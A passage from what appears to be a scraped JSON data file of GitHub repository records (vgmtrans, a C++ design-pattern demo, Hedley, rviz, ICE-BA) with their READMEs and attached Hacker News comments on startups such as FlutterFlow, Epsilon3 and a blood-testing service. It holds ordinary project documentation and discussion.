One example would be eggs - \"those are good for you, no wait they're bad and drive up your cholesterol, no wait, the cholesterol in eggs doesn't seem to raise cholesterol in humans who consume eggs\". I can see where you'd feel you have an edge by measuring each individual's blood over time, so you can see how test results change after making changes in diet or behavior - except maybe you aren't factoring in so many other changes. Maybe I moved somewhere colder and I'm getting less sunlight. Maybe I got COVID. Maybe I took up swimming. Ok, so now a blood test is showing that I'm at a slightly higher risk for a disease - do I follow Iollo's dietary guidance? Do I try to get more Vitamin D? Do I just write it off as noise? Do you have published research demonstrating that the sample collection process (and the 80uL specifically) is sufficiently precise to detect and quantify these metabolites within clinically meaningful ranges? This was the core problem with Theranos IIRC. I've quickly reviewed your sources below and they seem to be related to the clinical value of metabolites; I haven't seen one describing the precision of the device itself. I see you mention Theranos, but to be honest, this won't be the last time you get asked these questions. Every partner, news interview, and many potential customers will bring it up. So much so that I would create a page specifically addressing these issues (in more detail than the FAQ). Congratulations on the launch! I've always been fascinated by metabolomics, but it felt like such a complex data problem. What sort of recommendations will you make based on my results? How did you develop the recommendations? How can consumers feel confident that the insights they're getting are backed by legitimate research? (In other words, how are you escaping the perception that this is Theranos 2.0?) I've been trying to use this product for a personal app I'm making. It's really good until it's not. There need to be better controls for mock data in listviews; I don't want to hook up to an API in the tool, I have my own data, but I need the listview to at least pretend there's data there. Also, the lack of positioned widgets in conjunction with stack views makes it hard to transfer the FlutterFlow experience to the actual app. What happens if I want to anchor a view to the bottom of the screen in a stack? I can't without a positioned widget. Imagine I have this view https://github.com/o1298098/Flutter-Movie/blob/master/srceen... and I want the bottom white part to be the \"top\" of the stack. This image isn't the best example because the poster is the entire background; imagine instead I had a column and I wanted to stack the bottom white card over it. These kinds of details make me have to abandon an almost perfect tool; its utility is not quite 100%, which causes me to have to throw it all out. I really wish I could use this tool with all the native widgets, not just some. Beautiful product! As the saying goes, the best \"enterprise\" products are borne out of frustration you experience while trying to build your own consumer product - sounds like this was exactly how you landed on FlutterFlow :-) The example app doesn\u2019t work on the latest iOS Safari on an iPhone SE 2020. After 2 long loading screens you can progress through the app until you need to pick categories, but that screen is unscrollable, so you\u2019re stuck. Trying to go back breaks navigation and dumps you on a login page after a while. Flutter. 
Remember, it exists so Google can ram more ads and tracking down our throats (and eventually replace HTML and an open web). Don't use it. Is Flutter still a promising bet? Haven't heard much about it lately, but in principle I find it very interesting. Edit: wow, I am surprised; according to Statista it is the most popular mobile cross-platform framework (roughly on par with React Native): https://www.statista.com/statistics/869224/worldwide-softwar... I want a Visual Basic-style UI builder for Flutter but still want to code the business logic. Is that what this can do? I was a beta tester for FlutterFlow. While I didn't end up publishing an app (product-market fit wasn't where we wanted it and we pivoted hard to where an app wasn't needed), my coworkers and I went through a few iterations using it and really enjoyed the experience. The code export feature and overall business model make this a really great and fair tool for small development teams. Congrats on the launch and best of luck folks! This looks great. I signed up for a free account to test it out. My only complaint so far is the assumed integration with Firebase; perhaps this is because it's Flutter and they use everything Google? Is there a way to integrate other DBs? I see the API feature is only available for premium plans. Congrats on your launch. Have you taken any steps to help app developers using this tool make their apps accessible with a screen reader, e.g. prompting them to add text labels to image buttons? It would be great if this tool also had better theming options. Perhaps more pre-configured themes that auto-apply. I feel like you could take all these palettes and just make them auto-selectable themes. https://material.io/design/color/the-color-system.html#color... Where can I find the source code for FlutterFlow? Looks great. But is it restricted to building mobile apps only, or can it also help you build web apps in Flutter? Looks great! Reminds me very much of AppGyver, which is a tool I've been using in a few client projects. It uses React Native under the hood, allowing you, for example, to create logic using either the node-based logic builder or plain JavaScript. Interested to hear where you see your advantage over AppGyver and similar tools. One pain point of mine in visual app builders is not being able to search the \"code\", for example when I've built logic for fetching and mutating data in one view and now need to change it but can't remember where it is. Have you come across this problem, and have you already solved it/have a plan for solving it? Does this provide access to the Bluetooth API? This looks super exciting. As an Android developer who has not yet built a Flutter app, I'm intrigued whether this can be a stepping stone to ramping up on Flutter. I looked over the video. It is nice to see a compressed video, but it was still hard to understand what to pay attention to inside a 20 minute video. It would be great if you added callouts to the important moments so people could easily jump to the important items. Is Firebase a requirement? I tried to create a sample app and was immediately told I needed to set up Firebase. I didn't see a way to skip that step, but perhaps it is because I used a sample template? I would prefer to use GraphQL as a backend, and am not sure if the full Firebase stack (auth, storage, realtime) is used, or if you can swap pieces in and out when desired. Congratulations on your launch! Absolutely fantastic. 
I\u2019m a big Flutter fan and I figured it was just a matter of time before someone conjured this up. Well done lads. Congrats Alex and Abel! Was wowed when I first checked you guys out coming out of YC, and have been absolutely nothing but impressed by your product momentum and marketing capability throughout 2021. Really excited for you and going to try building along to see what's new! This looks awesome, but sadly, your education plan is practically unusable for most of Latin America, where .edu (or .ac) email addresses are very rare. I'm a college student and I can't apply because my university uses our country TLD. I hope you can reconsider this policy and begin using university domain lists [1] instead of just checking for TLDs. [1]: See https://github.com/Hipo/university-domains-list, for example. I've been using this myself and really enjoying it. I haven't been focusing too much on building a full app via this, but it is fantastic for building a mock-up of what something would look like in Flutter. It's easier to use and looks more like an app than anything you would build in Balsamiq or Figma, since it is basically a drag-n'-drop Flutter UX. At the end, you get the code used for building it, which is awesome for moving from mockup -> the actual app. Congrats on the launch. I've switched from Webflow to Flutter for the website I'm building (for my startup project). Flutter is awesome (though I still \"wonder what the result is gonna be\", but way less than with css) and I believe you're betting on a great horse. I don't know if you've noticed, but when you browse a Flutter website with Chrome on a desktop computer, it offers to install the app natively! Like you said: super cross-platform. Initially I was using Webflow because I don't understand a thing about css and I find the paradigm sux overall. But then, as a consequence, Webflow isn't to my taste either. I was building my Android app with Flutter and I thought I should just do the website with it as well. Best of luck, I think you're a hot startup. Ps: maybe you should consider marketing it for websites as well, not only apps (sry if you do already). I'm no expert to say it will be convincing for this end, but I'm never going back to html5 and its derivative frameworks, lemme tell you that :) Great job! I'd be happy if you can satisfy my technical curiosity: - Do you render a native Flutter web view when in WYSIWYG editing mode? If so - how do you support drag-n-drop over it? If not - how do you make it look the same as the web preview app? - I don't see in the free plan any data/network-related source code \u2014 is it hidden in your libs, or is all the machinery transparent in the source code (as long as I download it)? The chemist part of my brain is immediately nervous seeing Na metal + Cl2 gas anywhere near each other. While it was interesting at first, the peppering of inaccuracies, or at best oversimplifications, makes me doubt the veracity of the rest of the content. For example: > Non-rechargeable batteries have no such luck. Once drained, their chemistry cannot be restored. Rechargeable batteries have limited cycles due to problems, mainly solidification or breakdown of electrolytes that prevent restoration, but there are others, like mechanical effects. Most \"non-rechargeable\" batteries can actually be restored as well, in the same sense as those labeled rechargeable, but usually have a much lower cycle count due to these effects. 
For example, you can usually get a few cycles from your alkaline batteries, as long as you are trickle charging them, since they don't usually have good venting. Novel chemistries at the nano scale in the lab are fun to puzzle about, but pure silicon anode Li-ion batteries really are coming in the next six months, notably from Enovix, and will actually change things. A 2x density upgrade that's real is a whole lot more interesting than a 6x density upgrade that isn't ready for commercialization. \"sodium chloride (Na/Cl2)\" I'm not a chemist, but if I recall correctly, sodium chloride is NaCl, not NaCl2, i.e. common kitchen salt. Dear battery technology claimant, Thank you for your submission of proposed new revolutionary battery technology. Your new technology claims to be superior to existing lithium-ion technology and is just around the corner from taking over the world. Unfortunately your technology will likely fail, because: [ ] it is impractical to manufacture at scale. [ ] it will be too expensive for users. [ ] it suffers from too few recharge cycles. [ ] it is incapable of delivering current at sufficient levels. [ ] it lacks thermal stability at low or high temperatures. [ ] it lacks the energy density to make it sufficiently portable. [ ] it has too short of a lifetime. [ ] its charge rate is too slow. [ ] its materials are too toxic. [ ] it is too likely to catch fire or explode. [ ] it is too minimal of a step forward for anybody to care. [ ] this was already done 20 years ago and didn't work then. [ ] by the time it ships, li-ion advances will match it. [ ] your claims are lies. credit: https://news.ycombinator.com/item?id=26633630 Really interesting to compare with the publication itself: https://www.nature.com/articles/s41586-021-03757-z They don't mention six times more charge anywhere. Rather, the novelty is that they make a discharge reaction re-chargeable for the first time. The final paragraph hints at a rapid drop-off after the first discharge: > The battery delivered about 3,309 mAh first discharge capacity and was cyclable at 500\u20131,200 mAh. One can see a benefit in that a previously single-use battery could be cycled (e.g. a hearing aid). The press release claim is such a stretch as to be essentially a lie: > a high-performance rechargeable battery that could enable cellphones to be charged only once a week instead of daily and electric vehicles that can travel six times farther \"new battery tech\" and \"fusion is 10 years away\" - name a better duo. More features to add to the upcoming superbattery to end all battery problems. If we get all the battery innovations promised in the past 30 years, our energy problems are solved. For how important it is to modern society, the somewhat stagnating state of battery technology in comparison is baffling. Obviously there is a lot of $ thrown at this problem (securing the constant flow of such hopeful articles since the 2000s), but it feels like most of the gains since the Nokia days have come from improving HW/SW efficiency. If Lithium is dangerous, Chlorine is taking it up a notch. As far as I understand it basically sets anything it touches on fire, and at high concentrations is deadly within a few breaths. https://en.m.wikipedia.org/wiki/Sodium-ion_battery Rule #1 for any battery article: if Ctrl+F \"patent\" doesn't find anything, close the page without reading it. 
If it's not practical enough to patent, you will never see it in your hands. I'd rather have another gas engine from China now than this shit. Yet again, the useless milliamp-hours per gram for one component of a cell instead of actual energy per unit mass for a whole cell. What is the Watt-hours per kilogram???? Congrats! Great to see YC supporting more software companies that are working towards finally bringing the \"boring\" parts of the sector into the 21st century. If you're interested in exploring the idea of supply chain integration, I'd love to chat. We're an ESA-backed, online marketplace for the space sector [1], and we've built a few integrations already to bring tools and data together for engineers. [1] https://satsearch.com Excited to be using this product for ensuring clearly documented and easy-to-make test procedures for our propulsion testing, and eventually for our satellite operations. Keep up the good work Epsilon3, and I look forward to becoming a hardcore power user! Laura, congratulations. Does it support acronyms? :) Anyone interested should sign up for the changelog emails. It's only 1-2 emails a month and shows how much progress Laura and her team are making. Very cool domain and background. They are the real deal! Awesome team and product. Is your name a Babylon 5 reference? https://babylon5.fandom.com/wiki/Epsilon_III Interesting. This sounds like a good fit for CRDTs somewhat, though a centralized architecture might offer more robustness guarantees. On the other hand, it would be quite easy to display sync status as part of the UI. So excited to be part of Epsilon3 and helping so many awesome companies with their testing and operations. I hope everyone saw the recent epic Blue Origin and Virgin Galactic flights. Those are just the first small step in what's to be a very exciting future. Epsilon3 wants to eventually help so many more people go to space. Now that we\u2019ve had two billionaires go up to space, maybe someone in the HN community can be next? Is there any planned integration with requirement tracking software such as DOORS? If it were possible to flow test results back into the requirement specification systems, it could seriously save a lot of time and money. Also, for commenting on procedure steps, are there any additional tools available for the text formatting? We find we have to do a lot of red-lining and colour coding as things progress to track deviations in a simple way for customers and PA to find. Congrats, anything related to space sounds super cool :) Love this! It's certainly surprising that something like this doesn't exist for the space industry yet (and other industries that do complex testing and operations). Glad to see someone working to fill that gap, especially as the commercial space industry starts to blossom. Couple of thoughts/questions: 1.) How do you convince space orgs that using a third-party SaaS offering is a better approach than building it in-house? Especially as part of the ERP the org may be using already? 2.) Does Epsilon3 support scripted procedures? What language(s) does it support? 3.) Any thoughts on a ChatOps-like interface (e.g. Slack)? Would you say your software is appropriate for aerospace manufacturing and quality management system data collection? I don't yet understand the pain being addressed. If today it can be solved with pen and paper or Word, it looks to me that realtime sync or data visualization were not a must (disasters seem to be avoided today just as well). Nice to have, without doubt, but not a must. 
So your software makes it a nice experience for everybody involved, right? Oh, it\u2019s llcrabtree! We didn\u2019t cross paths but I\u2019ve seen your name all over Confluence. :) (I was on the training team after you left.) This is gonna be rad. Can\u2019t wait to see where it goes. Really excited to be part of this team! Laura was talking yesterday about tearing up after the Blue Origin launch, not just because it's amazing to send people to space, but because it requires the work and communication of thousands of people to take them up and bring them home safe. We're excited to build tools to enable all of the hard work that leads up to a successful launch! First, congrats on launching.\nSecond, \"AWS GovCloud for ITAR compliance\" - can the USG access my data (EU company) then? Excited for this launch! Our customers are doing literal rocket science, and every day is an amazing opportunity for us to build the supporting technology they need to do amazing things. Rocket science is hard, but running your operations shouldn't be! At Epsilon3 we're solving the software challenges of complex operations so you can get back to what you do best - space! Wow. This is enormously impressive. I currently work for a small startup based out of Denmark in the renewable energies space (wind turbines), developing web-based tools to assist in our ML operations. With a lifelong obsession with cosmology and astronomy, and, perhaps more relevantly, our own human advancement to and into the stars, I have become more and more inclined to the notion of further developing my current skillset with the eventual goal of transitioning to the space industry. My recent experience and exposure to renewable energies has given me massive insight into just how important companies like you guys are to furthering humanity\u2019s progress. My question to you all regarding your technology is how you manage what I imagine to be extraordinarily large, rich, and complex datasets that must vary between use cases (you mention hotels, debris removal, etc.). The data between these use cases must vary in structure \u2014 how is it normalized/standardized to work with your pipeline(s)? The commonality I see (as a fairly novice layman in terms of space technology) is of the rocket propulsion, orbiting, and payload delivery kind, but I\u2019m sure the data is far more nuanced and goes far beyond that. Furthermore, is any sort of machine learning applied on your side, perhaps in some sort of statistical analysis / metric reporting? I\u2019m definitely going to keep an eye on you all at Epsilon3. Perhaps you will be looking for more engineers with web dev, data, ML, and cyber/info security experience in the future! Huge props. I can tell there is an extraordinary amount of innovation involved with this venture. Excited to see where you all go with this =) Extremely excited for this launch! We have amazing companies doing some really cool stuff in the space sector! Cannot wait to support all the amazing missions with Epsilon3! This is awesome, and it made my day knowing that the space industry is big enough to support a startup building this kind of ops tooling. You said \u201cyou don\u2019t hear about most of those on the news\u201d and you\u2019re right - most of the customer logos on your website I\u2019d never heard of - is there a website / twitter / ? that you rely on for daily coverage? I would love to build a better view of the industry, players, priorities. Looks very interesting. 
I surfed around your site and watched the video. So how about nonconformance processing? Do you have workflows for that, or is that where something like JIRA comes in? Also, have you utilized anything like the S1000D aerospace data schema with this tool, or are you rolling your own? Congratulations on the launch, it sounds awesome. This is one of the companies where I would love to work. Are you taking remote candidates? I had no idea this niche existed. However, no sarcasm here at all, but do people in the space industry read HN and Product Hunt at all?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "vgmtrans/vgmtrans", "link": "https://github.com/vgmtrans/vgmtrans", "tags": ["instrument-formats", "music-files", "midi", "soundfont2", "dls", "vgmusic"], "stars": 657, "description": "VGMTrans - a tool to convert proprietary, sequenced videogame music to industry-standard formats", "lang": "C++", "repo_lang": "", "readme": "VGMTrans - Video Game Music Translator\r\n======================================\r\n| Platform | Status | Build available |\r\n| :-: | :-: | :-: |\r\n| Windows | [![Build status](https://github.com/vgmtrans/vgmtrans/actions/workflows/build.yml/badge.svg?branch=master)](https://github.com/vgmtrans/vgmtrans/actions/workflows/build.yml) | [Yes](https://github.com/vgmtrans/vgmtrans/actions/workflows/build.yml) |\r\n| macOS | [![Build status](https://github.com/vgmtrans/vgmtrans/actions/workflows/build.yml/badge.svg?branch=master)](https://github.com/vgmtrans/vgmtrans/actions/workflows/build.yml) | [DMG (not signed)](https://github.com/vgmtrans/vgmtrans/actions/workflows/build.yml) |\r\n| Linux | [![Build status](https://github.com/vgmtrans/vgmtrans/actions/workflows/build.yml/badge.svg?branch=master)](https://github.com/vgmtrans/vgmtrans/actions/workflows/build.yml) | [AppImage](https://github.com/vgmtrans/vgmtrans/actions/workflows/build.yml) |\r\n| FreeBSD | [![Build Status](https://api.cirrus-ci.com/github/vgmtrans/vgmtrans.svg)](https://cirrus-ci.com/github/vgmtrans/vgmtrans) | No |\r\n| Windows (legacy, 32-bit) | [![Build status](https://ci.appveyor.com/api/projects/status/ns62qg09yn5kmf18/branch/master?svg=true)](https://ci.appveyor.com/project/sykhro/vgmtrans-ci/branch/master) | [Yes](https://ci.appveyor.com/project/sykhro/vgmtrans-ci/branch/master/artifacts) |\r\n\r\nVGMTrans converts music files used in console video games into standard MIDI and DLS/SF2 files. It also plays these files in-program. 
The following formats are supported with varying degrees of accuracy:\r\n\r\n- Sony's PS2 sequence and instrument formats (.bq, .hd, .bd)\r\n- Squaresoft's PS2 sequence and instrument formats (.bgm, .wd)\r\n- Nintendo's Nintendo DS sequence and instrument formats (SDAT)\r\n- Late versions of Squaresoft's PS1 format known as AKAO - sequences and instruments\r\n- Sony's PS1 sequence and instrument formats (.seq, .vab)\r\n- Heartbeat's PS1 sequence format used in PS1 Dragon Quest games (.seqq)\r\n- Tamsoft's PS1 sequence and instrument formats (.tsq, .tvb)\r\n- Capcom's QSound sequence and instrument formats used in CPS1/CPS2 arcade games\r\n- Squaresoft's PS1 format used in certain PS1 games like Final Fantasy Tactics (smds/dwds)\r\n- Konami's PS1 sequence format known as KDT1\r\n- Nintendo's Gameboy Advance sequence format\r\n- Nintendo's SNES sequence and instrument format known as N-SPC (.spc)\r\n- Squaresoft's SNES sequence and instrument format (AKAO/SUZUKI/Itikiti) (.spc)\r\n- Capcom's SNES sequence and instrument format (.spc)\r\n- Konami's SNES sequence and instrument format (.spc)\r\n- Hudson's SNES sequence and instrument format (.spc)\r\n- Rare's SNES sequence and instrument format (.spc)\r\n- Heartbeat's SNES sequence and instrument format used in SNES Dragon Quest VI and III (.spc)\r\n- Akihiko Mori's SNES sequence and instrument format (.spc)\r\n- Pandora Box's SNES sequence and instrument format (.spc)\r\n- Graphic Research's SNES sequence and instrument format (.spc)\r\n- Chunsoft's SNES sequence and instrument format (.spc)\r\n- Compile's SNES sequence and instrument format (.spc)\r\n- Namco's SNES sequence and instrument format (.spc)\r\n- Prism Kikaku's SNES sequence and instrument format (.spc)\r\n\r\nThe source code includes preliminary work on additional formats. \r\n\r\nThis software is released under the zlib/libpng License. See LICENSE.txt.\r\n\r\nHow to use it\r\n-------------\r\n\r\nTo load a file, drag and drop the file into the application window. The program will scan any file for contained music files. It knows how to unpack psf, psf2 and certain zipped mame rom sets as specified in the mame_roms.xml file, though this last feature is fairly undeveloped. For example, drag on an NDS rom file and it will detect SDAT files and their contents.\r\n\r\nOnce loaded, double-clicking a file listed under \"Detected Music Files\" will bring up a color-coded hexadecimal display of the file with a break-down of each format element. Click the hexadecimal to highlight an element and see more information. Right click a detected file to bring up save options. To remove files from the \"Detected Music Files\" or \"Scanned Files\" list, highlight the files and press the delete key.\r\n\r\nThe \"Collections\" window displays file groupings that the software was able to infer. A sequence file will be paired with one or more instrument sets and/or sample collections. A collection can be played by highlighting it and pressing the play button or spacebar.\r\n\r\nHow to compile it\r\n-----------------\r\n\r\nPlease refer to [the wiki](https://github.com/vgmtrans/vgmtrans/wiki) for information on how to compile the two flavors of VGMTrans. 
\r\n\r\nContributors\r\n------------\r\n\r\n- Mike: The original author of the tool; worked on a lot of formats.\r\n- loveemu: Creator of the GitHub project; worked on bugfixes/improvements.\r\n- Sound Test: 774: Anonymous Japanese contributor on the 2ch BBS; worked on the HOSA format, analyzing the TriAcePS1 format and such.\r\n\r\n### Special Thanks\r\n\r\n- Bregalad: Author of [GBAMusRiper](http://www.romhacking.net/utilities/881/), a great reference for MP2k interpretation.\r\n- Nisto: Author of [kdt-tool](https://github.com/Nisto/kdt-tool); thank you for your approval of porting it to VGMTrans.\r\n- [Gnilda](https://twitter.com/god_gnilda): for his/her dedicated research of the SNES AKAO format. \r\n- [@brr890](https://twitter.com/brr890) and [@tssf](https://twitter.com/tssf): Contributed a lot of hints on the PS1 AKAO format.\r\n\r\nContact\r\n-------\r\n\r\nIf you enjoy the software, or have any questions, please contact the development team.\r\n\r\n\r\n", "readme_type": "markdown", "hn_comments": "I recently completed a big internationalization/localization project at my day job that took weeks of development time and coordination across the company. I wanted to find a better way to approach this problem and realized it's possible to do with JavaScript on the client side. Now you can translate your website into 100+ local languages in just a few minutes by adding a JavaScript snippet to your site. This is meant for small to medium sized businesses that can't afford the weeks of development time to translate their site for international customers. Let me know what you think! All feedback is appreciated.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "FengJungle/DesignPattern", "link": "https://github.com/FengJungle/DesignPattern", "tags": ["designpattern", "design-patterns", "cpp"], "stars": 657, "description": "Design pattern demo code", "lang": "C++", "repo_lang": "", "readme": "# DesignPattern\nJungle's design pattern series\n\n## Acknowledgements\nThanks to @ichdream for his contributions to this project; more contributors are welcome to submit modifications and corrections.\n\n## Corrections\n* 2021/10/28: GB2312 --> UTF-8\n* 2021/09/07: merged @ichdream's pull request: use smart pointers to manage heap objects, introduce a makefile to manage the project, change the file encoding format\n* 2021/04/04: added a virtual destructor to the virtual base class to avoid memory leaks\n* 2020/11/29: fixed a memory leak\n\n## Table of contents\n\nCode resources: https://github.com/FengJungle/DesignPattern\n\n01. Design Patterns - Overview of Design Patterns\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102513485\n\n02. Design Patterns (2) - Introduction to UML Class Diagrams\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102576624\n\n03. Design Patterns (3) - Object-Oriented Design Principles\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102578436\n\n04. Design Patterns (4) - Simple Factory Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102598181\n\n05. Design Patterns (5) - Factory Method Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102616501\n\n06. Design Patterns (6) - Abstract Factory Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102618384\n\n07. Design Patterns (7) - Builder Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102635881\n\n08. 
Design Patterns (8) - Prototype Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102642682\n\n09. Design Patterns (9) - Singleton Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102649056\n\n10. Design Patterns (10) - Adapter Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102656617\n\n11. Design Patterns (11) - Bridge Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102694306\n\n12. Design Patterns (12) - Composite Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102712738\n\n13. Design Patterns (13) - Decorator Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102733023\n\n14. Design Patterns (14) - Facade Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102752643\n\n15. Design Patterns (15) - Flyweight Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102763849\n\n16. Design Patterns (16) - Proxy Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102772697\n\n17. Design Patterns (17) - Chain of Responsibility Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102790445\n\n18. Design Patterns (18) - Command Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102810123\n\n19. Design Patterns (19) - Interpreter Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102864850\n\n20. Design Patterns (20) - Iterator Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102879383\n\n21. Design Patterns (21) - Mediator Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102885567\n\n22. Design Patterns (22) - Memento Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102907007\n\n23. Design Patterns (23) - Observer Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102927937\n\n24. Design Patterns (24) - State Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102966121\n\n25. Design Patterns (25) - Strategy Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102984862\n\n26. Design Patterns (26) - Template Method Pattern\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/102994585\n\n## Other\n\n27. So many design patterns! What will the interviewer ask?\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/120557373\n\n28. Highlights: interview test points for the Singleton Pattern! (C++ version)\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/120591638\n\n29. `new` can also create objects, so why do we need the Factory Pattern?\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/120754301\n\n30. Design Patterns in Qt\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/120936720\n\n31. The PImpl idiom\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/123150564\n\n32. 
Ah, how to follow the \"low coupling\" design principle?\n\nBlog address: https://blog.csdn.net/sinat_21107433/article/details/123160949", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nemequ/hedley", "link": "https://github.com/nemequ/hedley", "tags": [], "stars": 657, "description": "A C/C++ header to help move #ifdefs out of your code", "lang": "C++", "repo_lang": "", "readme": "# Hedley\n\n## Documentation\n\nFor documentation, see [https://nemequ.github.io/hedley/](https://nemequ.github.io/hedley/).\nThere is an easy-to-read user guide and full API documentation.\n\n## Brief Description\n\nHedley is a C/C++ header file designed to smooth over some\nplatform-specific annoyances. The idea is to get rid of a bunch of\nthe #ifdefs in your code and put them in Hedley instead or, if you\nhaven't bothered with platform-specific functionality in your code, to\nmake it easier to do so. This code can be used to improve:\n\n * Static analysis \u2014 better warnings and errors help you catch errors\n before they become a real issue.\n * Optimizations \u2014 compiler hints help speed up your code.\n * Manage public APIs\n * Visibility \u2014 keeping internal symbols private can make your\n program faster and smaller.\n * Versioning \u2014 help consumers avoid functions which are deprecated\n or too new for all the platforms they want to support.\n * C/C++ interoperability \u2014 make it easier to use code in both C and\n C++ compilers.\n* *\u2026 and more!*\n\nYou can safely use Hedley in your *public* API. If someone else\nincludes a newer version of Hedley later on, the newer Hedley will\njust redefine everything, and if someone includes an older version it\nwill simply be ignored.\n\nIt should be safe to use any of Hedley's features; if the platform\ndoesn't support the feature it will be silently ignored.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ros-visualization/rviz", "link": "https://github.com/ros-visualization/rviz", "tags": [], "stars": 656, "description": "ROS 3D Robot Visualizer", "lang": "C++", "repo_lang": "", "readme": "![rviz logo](https://raw.githubusercontent.com/ros-visualization/rviz/noetic-devel/images/splash.png)\n\n[![Format](https://github.com/ros-visualization/rviz/actions/workflows/format.yaml/badge.svg?branch=noetic-devel)](https://github.com/ros-visualization/rviz/actions/workflows/format.yaml?query=branch%3Anoetic-devel)\n[![CI](https://github.com/ros-visualization/rviz/actions/workflows/ci.yaml/badge.svg?branch=noetic-devel)](https://github.com/ros-visualization/rviz/actions/workflows/ci.yaml?query=branch%3Anoetic-devel)\n[![ROS CI](https://build.ros.org/buildStatus/icon?job=Ndev__rviz__ubuntu_focal_amd64)](https://build.ros.org/view/Ndev/job/Ndev__rviz__ubuntu_focal_amd64/)\n\nrviz is a 3D visualizer for the Robot Operating System (ROS) framework.\n\nFor more information, please see the wiki: http://wiki.ros.org/rviz\n\nMaintainers:\n- Robert Haschke (2019-)\n- William Woodall (2013-2018)\n- David Gossow (2013)\n- Dave Hershberger (2011-2013)\n- Josh Faust (2010)\n\nThis package contains Public Domain icons downloaded from http://tango.freedesktop.org/releases/.\n\nOther icons and graphics contained in this package are released into the Public Domain as well.\n\nCopyright notice for all icons and graphics in this package:\n\n```\nPublic Domain Dedication\n\nCopyright-Only Dedication (based on 
United States law) or Public Domain\nCertification\n\nThe person or persons who have associated work with this document (the\n\"Dedicator\" or \"Certifier\") hereby either (a) certifies that, to the best\nof his knowledge, the work of authorship identified is in the public\ndomain of the country from which the work is published, or (b)\nhereby dedicates whatever copyright the dedicator holds in the work\nof authorship identified below (the \"Work\") to the public domain. A\ncertifier, moreover, dedicates any copyright interest he may have in\nthe associated work, and for these purposes, is described as a\n\"dedicator\" below.\n\nA certifier has taken reasonable steps to verify the copyright\nstatus of this work. Certifier recognizes that his good faith efforts\nmay not shield him from liability if in fact the work certified is not\nin the public domain.\n\nDedicator makes this dedication for the benefit of the public at\nlarge and to the detriment of the Dedicator's heirs and successors.\nDedicator intends this dedication to be an overt act of relinquishment\nin perpetuity of all present and future rights under copyright law,\nwhether vested or contingent, in the Work. Dedicator understands that\nsuch relinquishment of all rights includes the relinquishment of all\nrights to enforce (by lawsuit or otherwise) those copyrights in the\nWork.\n\nDedicator recognizes that, once placed in the public domain, the Work\nmay be freely reproduced, distributed, transmitted, used, modified,\nbuilt upon, or otherwise exploited by anyone for any purpose, commercial\nor non-commercial, and in any way, including by methods that have not\nyet been invented or conceived.\n```\n\nSource: http://creativecommons.org/licenses/publicdomain/\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "baidu/ICE-BA", "link": "https://github.com/baidu/ICE-BA", "tags": [], "stars": 656, "description": null, "lang": "C++", "repo_lang": "", "readme": "# ICE-BA\n## ICE-BA: Incremental, Consistent and Efficient Bundle Adjustment for Visual-Inertial SLAM \nWe present ICE-BA, an incremental, consistent and efficient bundle adjustment for visual-inertial SLAM, which takes feature tracks, IMU measurements and optionally the loop constraints as input, performs in parallel both local BA over the sliding window and global BA over all keyframes, and outputs camera pose and updated map points for each frame in real-time. The main contributions include: \n- a new BA solver that leverages the incremental nature of SLAM measurements to achieve more than 10x efficiency compared to the state of the art. \n- a new relative marginalization algorithm that resolves the conflicts between sliding window marginalization bias and global loop closure constraints. \n\nBesides the backend solver, the library also provides an optical-flow-based frontend, which can be easily replaced by other more complicated frontends like ORB-SLAM2. \n\nThe original implementation of our ICE-BA is at https://github.com/ZJUCVG/EIBA, which only performs global BA and does not support IMU input. \n\n**Authors:** Haomin Liu, Mingyu Chen, Yingze Bao, Zhihao Wang \n**Related Publications:** \nHaomin Liu, Mingyu Chen, Guofeng Zhang, Hujun Bao and Yingze Bao. ICE-BA: Incremental, Consistent and Efficient Bundle Adjustment for\nVisual-Inertial SLAM. (Accepted by CVPR 2018). **[PDF](http://openaccess.thecvf.com/content_cvpr_2018/papers/Liu_ICE-BA_Incremental_Consistent_CVPR_2018_paper.pdf)**. 
